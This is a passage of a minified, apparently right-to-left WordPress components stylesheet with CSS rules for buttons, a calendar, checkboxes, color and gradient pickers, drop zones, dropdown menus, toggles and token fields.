.components-button.is-pressed:disabled:not(.is-primary):not(.is-secondary):not(.is-tertiary),.components-button.is-pressed[aria-disabled=true]:not(.is-primary):not(.is-secondary):not(.is-tertiary){ background:#949494; color:var(--wp-components-color-foreground-inverted, #fff); } .components-button.is-pressed:focus:not(:disabled){ box-shadow:inset 0 0 0 1px var(--wp-components-color-background, #fff), 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-button svg{ fill:currentColor; outline:none; } @media (forced-colors:active){ .components-button svg{ fill:CanvasText; } } .components-button .components-visually-hidden{ height:auto; } @keyframes components-button__busy-animation{ 0%{ background-position:right 200px top 0; } } .components-calendar{ background-color:var(--wp-components-color-background, #fff); color:var(--wp-components-color-foreground, #1e1e1e); display:inline-block; font-size:13px; font-weight:400; position:relative; z-index:0; } .components-calendar,.components-calendar *,.components-calendar :after,.components-calendar :before{ box-sizing:border-box; } .components-calendar__day{ padding:0; position:relative; } .components-calendar__day:has(.components-calendar__day-button:disabled){ color:var(--wp-components-color-gray-600, #949494); } .components-calendar__day:has(.components-calendar__day-button:focus-visible),.components-calendar__day:has(.components-calendar__day-button:hover:not(:disabled)){ color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-calendar__day-button{ align-items:center; background:none; border:none; border-radius:2px; color:inherit; cursor:pointer; display:flex; font:inherit; font-variant-numeric:tabular-nums; height:32px; justify-content:center; margin:0; padding:0; position:relative; width:32px; } .components-calendar__day-button:before{ border:none; border-radius:2px; content:""; inset:0; position:absolute; z-index:-1; } .components-calendar__day-button:after{ content:""; inset:0; pointer-events:none; position:absolute; z-index:1; } .components-calendar__day-button:disabled{ cursor:revert; } @media (forced-colors:active){ .components-calendar__day-button:disabled{ text-decoration:line-through; } } .components-calendar__day-button:focus-visible{ outline:var(--wp-admin-border-width-focus) solid var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline-offset:1px; } .components-calendar__caption-label{ align-items:center; border:0; display:inline-flex; position:relative; text-transform:capitalize; white-space:nowrap; z-index:1; } .components-calendar__button-next,.components-calendar__button-previous{ align-items:center; -moz-appearance:none; -webkit-appearance:none; appearance:none; background:none; border:none; border-radius:2px; color:inherit; cursor:pointer; display:inline-flex; height:32px; justify-content:center; margin:0; padding:0; position:relative; width:32px; } .components-calendar__button-next:disabled,.components-calendar__button-next[aria-disabled=true],.components-calendar__button-previous:disabled,.components-calendar__button-previous[aria-disabled=true]{ color:var(--wp-components-color-gray-600, #949494); cursor:revert; } .components-calendar__button-next:focus-visible,.components-calendar__button-previous:focus-visible{ outline:var(--wp-admin-border-width-focus) solid var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-calendar__chevron{ display:inline-block; fill:currentColor; height:16px; width:16px; } .components-calendar[dir=rtl] .components-calendar__nav .components-calendar__chevron{ transform:rotate(-180deg); transform-origin:50%; } .components-calendar__month-caption{ align-content:center; display:flex; height:32px; justify-content:center; margin-bottom:12px; } .components-calendar__months{ display:flex; flex-wrap:wrap; gap:16px; justify-content:center; max-width:fit-content; position:relative; } .components-calendar__month-grid{ border-collapse:initial; border-spacing:0 4px; } .components-calendar__nav{ align-items:center; display:flex; height:32px; inset-block-start:0; inset-inline-end:0; inset-inline-start:0; justify-content:space-between; position:absolute; } .components-calendar__weekday{ color:var(--wp-components-color-gray-700, #757575); height:32px; padding:0; text-align:center; text-transform:uppercase; width:32px; } .components-calendar__day--today:after{ border:2px solid; border-radius:50%; content:""; height:0; inset-block-start:2px; inset-inline-end:2px; position:absolute; width:0; z-index:1; } .components-calendar__day--selected:not(.components-calendar__range-middle):has(.components-calendar__day-button,.components-calendar__day-button:hover:not(:disabled)){ color:var(--wp-components-color-foreground-inverted, #fff); } .components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:before{ background-color:var(--wp-components-color-foreground, #1e1e1e); border:1px solid #0000; } .components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:disabled:before{ background-color:var(--wp-components-color-gray-600, #949494); } .components-calendar__day--selected:not(.components-calendar__range-middle) .components-calendar__day-button:hover:not(:disabled):before{ background-color:var(--wp-components-color-gray-800, #2f2f2f); } .components-calendar__day--hidden{ visibility:hidden; } .components-calendar__range-start:not(.components-calendar__range-end) .components-calendar__day-button,.components-calendar__range-start:not(.components-calendar__range-end) .components-calendar__day-button:before{ border-end-end-radius:0; border-start-end-radius:0; } .components-calendar__range-middle .components-calendar__day-button:before{ background-color:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 4%, #0000); border-color:#0000; border-radius:0; border-style:solid; border-width:1px 0; } .components-calendar__range-end:not(.components-calendar__range-start) .components-calendar__day-button,.components-calendar__range-end:not(.components-calendar__range-start) .components-calendar__day-button:before{ border-end-start-radius:0; border-start-start-radius:0; } .components-calendar__day--preview svg{ color:color-mix(in srgb, var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)) 16%, #0000); inset:0; pointer-events:none; position:absolute; } @media (forced-colors:active){ .components-calendar__day--preview svg{ color:inherit; } } .components-calendar[dir=rtl] .components-calendar__day--preview svg{ transform:scaleX(-1); } .components-calendar__day--preview.components-calendar__range-middle .components-calendar__day-button:before{ border:none; } @keyframes slide-in-left{ 0%{ transform:translateX(100%); } to{ transform:translateX(0); } } @keyframes slide-in-right{ 0%{ transform:translateX(-100%); } to{ transform:translateX(0); } } @keyframes slide-out-left{ 0%{ transform:translateX(0); } to{ transform:translateX(100%); } } @keyframes slide-out-right{ 0%{ transform:translateX(0); } to{ transform:translateX(-100%); } } @keyframes fade-in{ 0%{ opacity:0; } to{ opacity:1; } } @keyframes fade-out{ 0%{ opacity:1; } to{ opacity:0; } } .components-calendar__caption-after-enter,.components-calendar__caption-after-exit,.components-calendar__caption-before-enter,.components-calendar__caption-before-exit,.components-calendar__weeks-after-enter,.components-calendar__weeks-after-exit,.components-calendar__weeks-before-enter,.components-calendar__weeks-before-exit{ animation-duration:0s; animation-fill-mode:forwards; animation-timing-function:cubic-bezier(.4, 0, .2, 1); } @media not (prefers-reduced-motion){ .components-calendar__caption-after-enter,.components-calendar__caption-after-exit,.components-calendar__caption-before-enter,.components-calendar__caption-before-exit,.components-calendar__weeks-after-enter,.components-calendar__weeks-after-exit,.components-calendar__weeks-before-enter,.components-calendar__weeks-before-exit{ animation-duration:.3s; } } .components-calendar[dir=rtl] .components-calendar__weeks-after-enter,.components-calendar__weeks-before-enter{ animation-name:slide-in-left; } .components-calendar[dir=rtl] .components-calendar__weeks-after-exit,.components-calendar__weeks-before-exit{ animation-name:slide-out-left; } .components-calendar[dir=rtl] .components-calendar__weeks-before-enter,.components-calendar__weeks-after-enter{ animation-name:slide-in-right; } .components-calendar[dir=rtl] .components-calendar__weeks-before-exit,.components-calendar__weeks-after-exit{ animation-name:slide-out-right; } .components-calendar__caption-after-enter{ animation-name:fade-in; } .components-calendar__caption-after-exit{ animation-name:fade-out; } .components-calendar__caption-before-enter{ animation-name:fade-in; } .components-calendar__caption-before-exit{ animation-name:fade-out; } .components-checkbox-control{ --checkbox-input-size:24px; } @media (min-width:600px){ .components-checkbox-control{ --checkbox-input-size:16px; } } .components-checkbox-control{ --checkbox-input-margin:8px; } .components-checkbox-control__label{ cursor:pointer; line-height:var(--checkbox-input-size); } .components-checkbox-control__input[type=checkbox]{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; margin-left:12px; padding:6px 8px; transition:none; } @media not (prefers-reduced-motion){ .components-checkbox-control__input[type=checkbox]{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-checkbox-control__input[type=checkbox]{ font-size:13px; line-height:normal; } } .components-checkbox-control__input[type=checkbox]:focus{ border-color:var(--wp-admin-theme-color); box-shadow:0 0 0 .5px var(--wp-admin-theme-color); } .components-checkbox-control__input[type=checkbox]::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-checkbox-control__input[type=checkbox]::-moz-placeholder{ color:#1e1e1e9e; } .components-checkbox-control__input[type=checkbox]:-ms-input-placeholder{ color:#1e1e1e9e; } .components-checkbox-control__input[type=checkbox]:focus{ box-shadow:0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); } .components-checkbox-control__input[type=checkbox]:checked{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .components-checkbox-control__input[type=checkbox]:checked::-ms-check{ opacity:0; } .components-checkbox-control__input[type=checkbox]:checked:before,.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{ color:#fff; margin:-3px -5px; } @media (min-width:782px){ .components-checkbox-control__input[type=checkbox]:checked:before,.components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{ margin:-4px -5px 0 0; } } .components-checkbox-control__input[type=checkbox][aria-checked=mixed]{ background:var(--wp-admin-theme-color); border-color:var(--wp-admin-theme-color); } .components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{ content:"\f460"; display:inline-block; float:right; font:normal 30px/1 dashicons; vertical-align:middle; width:16px; speak:none; -webkit-font-smoothing:antialiased; -moz-osx-font-smoothing:grayscale; } @media (min-width:782px){ .components-checkbox-control__input[type=checkbox][aria-checked=mixed]:before{ float:none; font-size:21px; } } .components-checkbox-control__input[type=checkbox]:disabled,.components-checkbox-control__input[type=checkbox][aria-disabled=true]{ background:#f0f0f0; border-color:#ddd; cursor:default; opacity:1; } .components-checkbox-control__input[type=checkbox]{ appearance:none; background:#fff; clear:none; color:#1e1e1e; cursor:pointer; display:inline-block; height:var(--checkbox-input-size); line-height:0; margin:0 0 0 4px; outline:0; padding:0 !important; text-align:center; vertical-align:top; width:var(--checkbox-input-size); } @media not (prefers-reduced-motion){ .components-checkbox-control__input[type=checkbox]{ transition:border-color .1s ease-in-out; } } .components-checkbox-control__input[type=checkbox]:focus{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-admin-theme-color); outline:2px solid #0000; outline-offset:2px; } .components-checkbox-control__input[type=checkbox]:checked,.components-checkbox-control__input[type=checkbox]:indeterminate{ background:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-checkbox-control__input[type=checkbox]:checked::-ms-check,.components-checkbox-control__input[type=checkbox]:indeterminate::-ms-check{ opacity:0; } .components-checkbox-control__input[type=checkbox]:checked:before{ content:none; } .components-checkbox-control__input-container{ aspect-ratio:1; display:inline-block; flex-shrink:0; line-height:1; margin-left:var(--checkbox-input-margin); position:relative; vertical-align:middle; width:var(--checkbox-input-size); } svg.components-checkbox-control__checked,svg.components-checkbox-control__indeterminate{ --checkmark-size:var(--checkbox-input-size); fill:#fff; cursor:pointer; height:var(--checkmark-size); pointer-events:none; position:absolute; right:50%; top:50%; transform:translate(50%, -50%); -webkit-user-select:none; user-select:none; width:var(--checkmark-size); } @media (min-width:600px){ svg.components-checkbox-control__checked,svg.components-checkbox-control__indeterminate{ --checkmark-size:calc(var(--checkbox-input-size) + 4px); } } .components-checkbox-control__help{ display:inline-block; margin-inline-start:calc(var(--checkbox-input-size) + var(--checkbox-input-margin)); } .components-circular-option-picker{ display:inline-block; min-width:188px; width:100%; } .components-circular-option-picker .components-circular-option-picker__custom-clear-wrapper{ display:flex; justify-content:flex-end; margin-top:12px; } .components-circular-option-picker .components-circular-option-picker__swatches{ display:flex; flex-wrap:wrap; gap:12px; position:relative; z-index:1; } .components-circular-option-picker>:not(.components-circular-option-picker__swatches){ position:relative; z-index:0; } .components-circular-option-picker__option-wrapper{ display:inline-block; height:28px; transform:scale(1); vertical-align:top; width:28px; } @media not (prefers-reduced-motion){ .components-circular-option-picker__option-wrapper{ transition:transform .1s ease; will-change:transform; } } .components-circular-option-picker__option-wrapper:hover{ transform:scale(1.2); } .components-circular-option-picker__option-wrapper>div{ height:100%; width:100%; } .components-circular-option-picker__option-wrapper:before{ background:url("data:image/svg+xml;charset=utf-8,%3Csvg xmlns='http://www.w3.org/2000/svg' width='28' height='28' fill='none'%3E%3Cpath fill='%23555d65' d='M6 8V6H4v2zm2 0V6h2v2zm2 8H8v-2h2zm2 0v-2h2v2zm0 2v-2h-2v2H8v2h2v-2zm2 0v2h-2v-2zm2 0h-2v-2h2z'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M18 18h2v-2h-2v-2h2v-2h-2v-2h2V8h-2v2h-2V8h-2v2h2v2h-2v2h2v2h2zm-2-4v-2h2v2z' clip-rule='evenodd'/%3E%3Cpath fill='%23555d65' d='M18 18v2h-2v-2z'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M8 10V8H6v2H4v2h2v2H4v2h2v2H4v2h2v2H4v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2v2h-2V4h-2v2h-2V4h-2v2h-2V4h-2v2h2v2h-2v2zm0 2v-2H6v2zm2 0v-2h2v2zm0 2v-2H8v2H6v2h2v2H6v2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h-2v2h-2V6h-2v2h-2v2h2v2h-2v2z' clip-rule='evenodd'/%3E%3Cpath fill='%23555d65' fill-rule='evenodd' d='M4 0H2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v2H0v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2V2h2V0h-2v2h-2V0h-2v2h-2V0h-2v2h-2V0h-2v2h-2V0h-2v2H8V0H6v2H4zm0 4V2H2v2zm2 0V2h2v2zm0 2V4H4v2H2v2h2v2H2v2h2v2H2v2h2v2H2v2h2v2H2v2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h2v2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2v-2h-2v-2h2V8h-2V6h2V4h-2V2h-2v2h-2V2h-2v2h-2V2h-2v2h-2V2h-2v2H8v2z' clip-rule='evenodd'/%3E%3C/svg%3E"); border-radius:50%; bottom:1px; content:""; left:1px; position:absolute; right:1px; top:1px; z-index:-1; } .components-circular-option-picker__option{ aspect-ratio:1; background:#0000; border:none; border-radius:50%; box-shadow:inset 0 0 0 14px; display:inline-block; height:100% !important; vertical-align:top; } @media not (prefers-reduced-motion){ .components-circular-option-picker__option{ transition:box-shadow .1s ease; } } .components-circular-option-picker__option{ cursor:pointer; } .components-circular-option-picker__option:hover{ box-shadow:inset 0 0 0 14px !important; } .components-circular-option-picker__option[aria-pressed=true],.components-circular-option-picker__option[aria-selected=true]{ box-shadow:inset 0 0 0 4px; overflow:visible; position:relative; z-index:1; } .components-circular-option-picker__option[aria-pressed=true]+svg,.components-circular-option-picker__option[aria-selected=true]+svg{ border-radius:50%; pointer-events:none; position:absolute; right:2px; top:2px; z-index:2; } .components-circular-option-picker__option:after{ border:1px solid #0000; border-radius:50%; bottom:-1px; box-shadow:inset 0 0 0 1px #0003; box-sizing:inherit; content:""; left:-1px; position:absolute; right:-1px; top:-1px; } .components-circular-option-picker__option:focus:after{ border:2px solid #757575; border-radius:50%; box-shadow:inset 0 0 0 2px #fff; content:""; height:calc(100% + 4px); position:absolute; right:50%; top:50%; transform:translate(50%, -50%); width:calc(100% + 4px); } .components-circular-option-picker__option.components-button:focus{ background-color:initial; box-shadow:inset 0 0 0 14px; outline:none; } .components-circular-option-picker__button-action .components-circular-option-picker__option{ background:#fff; color:#fff; } .components-circular-option-picker__dropdown-link-action{ margin-left:16px; } .components-circular-option-picker__dropdown-link-action .components-button{ line-height:22px; } .components-palette-edit__popover-gradient-picker{ padding:8px; width:260px; } .components-dropdown-menu__menu .components-palette-edit__menu-button{ width:100%; } .component-color-indicator{ background:#fff linear-gradient(45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); border-radius:50%; box-shadow:inset 0 0 0 1px #0003; display:inline-block; height:20px; padding:0; width:20px; } .components-combobox-control{ width:100%; } input.components-combobox-control__input[type=text]{ background:var(--wp-components-color-background, #fff); border:none; box-shadow:none; color:var(--wp-components-color-foreground, #1e1e1e); font-family:inherit; font-size:16px; line-height:inherit; margin:0; min-height:auto; padding:2px; width:100%; } @media (min-width:600px){ input.components-combobox-control__input[type=text]{ font-size:13px; } } input.components-combobox-control__input[type=text]:focus{ box-shadow:none; outline:none; } .components-combobox-control__suggestions-container{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .components-combobox-control__suggestions-container{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-combobox-control__suggestions-container{ font-size:13px; line-height:normal; } } .components-combobox-control__suggestions-container:focus{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-combobox-control__suggestions-container::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-combobox-control__suggestions-container::-moz-placeholder{ color:#1e1e1e9e; } .components-combobox-control__suggestions-container:-ms-input-placeholder{ color:#1e1e1e9e; } .components-combobox-control__suggestions-container{ align-items:flex-start; display:flex; flex-wrap:wrap; padding:0; width:100%; } .components-combobox-control__suggestions-container:focus-within{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-combobox-control__suggestions-container .components-spinner{ margin:0; } .components-color-palette__custom-color-wrapper{ position:relative; z-index:0; } .components-color-palette__custom-color-button{ background:none; border:none; border-radius:4px 4px 0 0; box-shadow:inset 0 0 0 1px #0003; box-sizing:border-box; cursor:pointer; height:64px; outline:1px solid #0000; position:relative; width:100%; } .components-color-palette__custom-color-button:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline-width:2px; } .components-color-palette__custom-color-button:after{ background-image:repeating-linear-gradient(45deg, #e0e0e0 25%, #0000 0, #0000 75%, #e0e0e0 0, #e0e0e0), repeating-linear-gradient(45deg, #e0e0e0 25%, #0000 0, #0000 75%, #e0e0e0 0, #e0e0e0); background-position:0 0, 24px 24px; background-size:48px 48px; border-radius:3px 3px 0 0; content:""; inset:1px; position:absolute; z-index:-1; } .components-color-palette__custom-color-text-wrapper{ border-radius:0 0 4px 4px; box-shadow:inset 0 -1px 0 0 #0003,inset -1px 0 0 0 #0003,inset 1px 0 0 0 #0003; font-size:13px; padding:12px 16px; position:relative; } .components-color-palette__custom-color-name{ color:var(--wp-components-color-foreground, #1e1e1e); margin:0 1px; } .components-color-palette__custom-color-value{ color:#757575; } .components-color-palette__custom-color-value--is-hex{ text-transform:uppercase; } .components-color-palette__custom-color-value:empty:after{ content:"​"; visibility:hidden; } .components-custom-gradient-picker__gradient-bar{ border-radius:2px; height:48px; position:relative; width:100%; z-index:1; } .components-custom-gradient-picker__gradient-bar.has-gradient{ background-image:repeating-linear-gradient(45deg, #e0e0e0 25%, #0000 0, #0000 75%, #e0e0e0 0, #e0e0e0), repeating-linear-gradient(45deg, #e0e0e0 25%, #0000 0, #0000 75%, #e0e0e0 0, #e0e0e0); background-position:0 0, 12px 12px; background-size:24px 24px; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__gradient-bar-background{ inset:0; position:absolute; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__markers-container{ margin-left:auto; margin-right:auto; position:relative; width:calc(100% - 48px); } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-dropdown{ display:flex; height:16px; position:absolute; top:16px; width:16px; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__insert-point-dropdown{ background:#fff; border-radius:50%; color:#1e1e1e; height:inherit; min-width:16px !important; padding:2px; position:relative; width:inherit; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__insert-point-dropdown svg{ height:100%; width:100%; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button{ border-radius:50%; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 2px 0 #00000040; height:inherit; outline:2px solid #0000; padding:0; width:inherit; } .components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button.is-active,.components-custom-gradient-picker__gradient-bar .components-custom-gradient-picker__control-point-button:focus{ box-shadow:inset 0 0 0 calc(var(--wp-admin-border-width-focus)*2) #fff, 0 0 2px 0 #00000040; outline:1.5px solid #0000; } .components-custom-gradient-picker__remove-control-point-wrapper{ padding-bottom:8px; } .components-custom-gradient-picker__inserter{ direction:ltr; } .components-custom-gradient-picker__liner-gradient-indicator{ display:inline-block; flex:0 auto; height:20px; width:20px; } .components-custom-gradient-picker__ui-line{ position:relative; z-index:0; } body.is-dragging-components-draggable{ cursor:move; cursor:grabbing !important; } .components-draggable__invisible-drag-image{ height:50px; position:fixed; right:-1000px; width:50px; } .components-draggable__clone{ background:#0000; padding:0; pointer-events:none; position:fixed; z-index:1000000000; } .components-drop-zone{ border-radius:2px; bottom:0; left:0; opacity:0; position:absolute; right:0; top:0; visibility:hidden; z-index:40; } .components-drop-zone.is-active{ opacity:1; visibility:visible; } .components-drop-zone .components-drop-zone__content{ align-items:center; background-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); bottom:0; color:#fff; display:flex; height:100%; justify-content:center; left:0; opacity:0; pointer-events:none; position:absolute; right:0; text-align:center; top:0; width:100%; z-index:50; } .components-drop-zone .components-drop-zone__content-inner{ opacity:0; transform:scale(.9); } .components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content{ opacity:1; } @media not (prefers-reduced-motion){ .components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content{ transition:opacity .2s ease-in-out; } } .components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content-inner{ opacity:1; transform:scale(1); } @media not (prefers-reduced-motion){ .components-drop-zone.is-active.is-dragging-over-element .components-drop-zone__content-inner{ transition:opacity .1s ease-in-out .1s,transform .1s ease-in-out .1s; } } .components-drop-zone__content-icon,.components-drop-zone__content-text{ display:block; } .components-drop-zone__content-icon{ line-height:0; margin:0 auto 8px; fill:currentColor; pointer-events:none; } .components-drop-zone__content-text{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; } .components-dropdown{ display:inline-block; } .components-dropdown__content .components-popover__content{ padding:8px; } .components-dropdown__content .components-popover__content:has(.components-menu-group){ padding:0; } .components-dropdown__content .components-popover__content:has(.components-menu-group) .components-dropdown-menu__menu>.components-menu-item__button,.components-dropdown__content .components-popover__content:has(.components-menu-group)>.components-menu-item__button{ margin:8px; width:auto; } .components-dropdown__content [role=menuitem]{ white-space:nowrap; } .components-dropdown__content .components-menu-group{ padding:8px; } .components-dropdown__content .components-menu-group+.components-menu-group{ border-top:1px solid #ccc; padding:8px; } .components-dropdown__content.is-alternate .components-menu-group+.components-menu-group{ border-color:#1e1e1e; } .components-dropdown-menu__toggle{ vertical-align:top; } .components-dropdown-menu__menu{ font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:13px; line-height:1.4; width:100%; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item,.components-dropdown-menu__menu .components-menu-item{ cursor:pointer; outline:none; padding:6px; white-space:nowrap; width:100%; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item.has-separator,.components-dropdown-menu__menu .components-menu-item.has-separator{ margin-top:6px; overflow:visible; position:relative; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item.has-separator:before,.components-dropdown-menu__menu .components-menu-item.has-separator:before{ background-color:#ddd; box-sizing:initial; content:""; display:block; height:1px; left:0; position:absolute; right:0; top:-3px; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-active .dashicon,.components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-active svg,.components-dropdown-menu__menu .components-menu-item.is-active .dashicon,.components-dropdown-menu__menu .components-menu-item.is-active svg{ background:#1e1e1e; border-radius:1px; box-shadow:0 0 0 1px #1e1e1e; color:#fff; } .components-dropdown-menu__menu .components-dropdown-menu__menu-item.is-icon-only,.components-dropdown-menu__menu .components-menu-item.is-icon-only{ width:auto; } .components-dropdown-menu__menu .components-menu-item__button,.components-dropdown-menu__menu .components-menu-item__button.components-button{ height:auto; min-height:40px; padding-left:8px; padding-right:8px; text-align:right; } .components-duotone-picker__color-indicator:before{ background:#0000; } .components-duotone-picker__color-indicator>.components-button,.components-duotone-picker__color-indicator>.components-button.is-pressed:hover:not(:disabled){ background:linear-gradient(45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); color:#0000; } .components-duotone-picker__color-indicator>.components-button:hover:not(:disabled):not([aria-disabled=true]),.components-duotone-picker__color-indicator>.components-button:not([aria-disabled=true]):active{ color:#0000; } .components-color-list-picker,.components-color-list-picker__swatch-button{ width:100%; } .components-color-list-picker__color-picker{ margin:8px 0; } .components-color-list-picker__swatch-color{ margin:2px; } .components-external-link{ text-decoration:none; } .components-external-link__contents{ text-decoration:underline; } .components-external-link__icon{ font-weight:400; margin-right:.5ch; } .components-form-toggle,.components-form-toggle .components-form-toggle__track{ display:inline-block; height:16px; position:relative; } .components-form-toggle .components-form-toggle__track{ background-color:#fff; border:1px solid #949494; border-radius:8px; box-sizing:border-box; content:""; vertical-align:top; width:32px; } @media not (prefers-reduced-motion){ .components-form-toggle .components-form-toggle__track{ transition:background-color .2s ease,border-color .2s ease; } } .components-form-toggle .components-form-toggle__track{ overflow:hidden; } .components-form-toggle .components-form-toggle__track:after{ border-top:16px solid #0000; box-sizing:border-box; content:""; inset:0; position:absolute; } @media not (prefers-reduced-motion){ .components-form-toggle .components-form-toggle__track:after{ transition:opacity .2s ease; } } .components-form-toggle .components-form-toggle__track:after{ opacity:0; } .components-form-toggle .components-form-toggle__thumb{ border-radius:50%; box-sizing:border-box; display:block; height:12px; position:absolute; right:2px; top:2px; width:12px; } @media not (prefers-reduced-motion){ .components-form-toggle .components-form-toggle__thumb{ transition:transform .2s ease,background-color .2s ease-out; } } .components-form-toggle .components-form-toggle__thumb{ background-color:#1e1e1e; border:6px solid #0000; box-shadow:0 1px 1px #00000008,0 1px 2px #00000005,0 3px 3px #00000005,0 4px 4px #00000003; } .components-form-toggle.is-checked .components-form-toggle__track{ background-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); } .components-form-toggle.is-checked .components-form-toggle__track:after{ opacity:1; } .components-form-toggle .components-form-toggle__input:focus+.components-form-toggle__track{ box-shadow:0 0 0 var(--wp-admin-border-width-focus) #fff, 0 0 0 calc(var(--wp-admin-border-width-focus)*2) var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; outline-offset:2px; } .components-form-toggle.is-checked .components-form-toggle__thumb{ background-color:#fff; border-width:0; transform:translateX(-16px); } .components-disabled .components-form-toggle,.components-form-toggle.is-disabled{ opacity:.3; } .components-form-toggle input.components-form-toggle__input[type=checkbox]{ border:none; height:100%; margin:0; opacity:0; padding:0; position:absolute; right:0; top:0; width:100%; z-index:1; } .components-form-toggle input.components-form-toggle__input[type=checkbox]:checked{ background:none; } .components-form-toggle input.components-form-toggle__input[type=checkbox]:before{ content:""; } .components-form-toggle input.components-form-toggle__input[type=checkbox]:not(:disabled,[aria-disabled=true]){ cursor:pointer; } .components-form-token-field__input-container{ border:1px solid #949494; border-radius:2px; box-shadow:0 0 0 #0000; font-family:-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,Oxygen-Sans,Ubuntu,Cantarell,Helvetica Neue,sans-serif; font-size:16px; line-height:normal; padding:6px 8px; } @media not (prefers-reduced-motion){ .components-form-token-field__input-container{ transition:box-shadow .1s linear; } } @media (min-width:600px){ .components-form-token-field__input-container{ font-size:13px; line-height:normal; } } .components-form-token-field__input-container:focus{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-form-token-field__input-container::-webkit-input-placeholder{ color:#1e1e1e9e; } .components-form-token-field__input-container::-moz-placeholder{ color:#1e1e1e9e; } .components-form-token-field__input-container:-ms-input-placeholder{ color:#1e1e1e9e; } .components-form-token-field__input-container{ cursor:text; padding:0; width:100%; } .components-form-token-field__input-container.is-disabled{ background:#ddd; border-color:#ddd; } .components-form-token-field__input-container.is-active{ border-color:var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); box-shadow:0 0 0 .5px var(--wp-components-color-accent, var(--wp-admin-theme-color, #3858e9)); outline:2px solid #0000; } .components-form-token-field__input-container input[type=text].components-form-token-field__input{ background:inherit; border:0; 